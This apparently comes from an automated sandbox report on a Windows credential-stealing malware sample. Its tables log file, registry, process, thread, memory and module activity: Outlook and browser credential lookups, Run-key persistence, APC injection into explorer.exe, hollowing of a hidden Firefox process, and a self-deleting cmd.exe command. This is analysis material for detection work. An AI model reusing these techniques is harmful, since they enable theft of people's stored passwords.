| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1514, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1538, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1566, size = 6 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1572, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1598, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1632, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1664, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | offset = 1684, size = 4 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logri.ini | offset = 0, size = 40 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrv.ini | offset = 0, size = 40 |
|
1 |
Registry (102)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\ | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = ProductName |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\ | value_name = CurrentVersion |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | value_name = Install Directory |
|
1 | |
| Write Value | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = J0HDI47HUBA, data = C:\Program Files (x86)\Lihhl\services3f4.exe, size = 88, type = REG_SZ |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\ | - |
|
14 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
3 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\ | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\ | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
3 |
Process (8)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SysWOW64\cmd.exe | os_pid = 0x8e8, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | os_pid = 0x8a8, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, show_window = SW_HIDE |
|
1 | |
| Get Info | c:\windows\explorer.exe | type = PROCESS_WOW64_INFORMATION |
|
1 | |
| Get Info | c:\windows\explorer.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = PROCESS_WOW64_INFORMATION |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
2 |
Thread (7)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Suspend | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Get Context | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Queue APC | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Set Context | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Resume | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Resume | c:\windows\syswow64\systray.exe | os_tid = 0xbe8 |
|
1 |
Memory (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | address = 0xfffde000, size = 32 |
|
1 | |
| Read | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | address = 0x12d0000, size = 278528 |
|
1 |
Module (21)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | crypt32.dll | base_address = 0x0 |
|
1 | |
| Load | ole32.dll | base_address = 0x0 |
|
1 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0xc0000135 |
|
1 | |
| Load | winsqlite3.dll | base_address = 0xc0000135 |
|
1 | |
| Load | vaultcli.dll | base_address = 0x0 |
|
1 | |
| Load | gdiplus.dll | base_address = 0x0 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2744928 |
|
1 | |
| Create Mapping | - | protection = PAGE_READWRITE, maximum_size = 2743516 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2741168 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2742976 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2743028 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\systray.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xa0000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\systray.exe, protection = PAGE_READWRITE, address_out = 0x2230000 |
|
1 | |
| Map | - | process_name = c:\windows\explorer.exe, protection = PAGE_READWRITE, address_out = 0x7a30000 |
|
1 | |
| Map | - | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x8400000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\systray.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1df0000 |
|
1 | |
| Map | - | process_name = C:\Program Files (x86)\Mozilla Firefox\Firefox.exe, protection = PAGE_READWRITE, address_out = 0x3c0000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\systray.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x3790000 |
|
1 | |
| Map | - | process_name = C:\Program Files (x86)\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x70000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\systray.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x620000 |
|
1 | |
| Map | - | process_name = C:\Program Files (x86)\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x12d0000 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (34)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 2744016 milliseconds (2744.016 seconds) |
|
1 | |
| Sleep | duration = 2744968 milliseconds (2744.968 seconds) |
|
15 | |
| Sleep | duration = 2744968 milliseconds (2744.968 seconds) |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
17 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = 598MPR44-CZEWG7B, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Create | mutex_name = 9468738FSVT1AWZz, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Mozilla Firefox, environment = 0 |
|
1 | |
| Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\, environment = 0 |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\windows\syswow64\systray.exe | - |
|
1 |
Process #12: cmd.exe
65
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:26, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8e8 |
| Parent PID | 0xbe4 (c:\windows\syswow64\systray.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8E4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00076fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00081fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x002b0000 | 0x0036ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00837fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x01dcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001dd0000 | 0x01dd0000 | 0x02112fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x4acd0000 | 0x4ad1bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x752f0000 | 0x752f6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
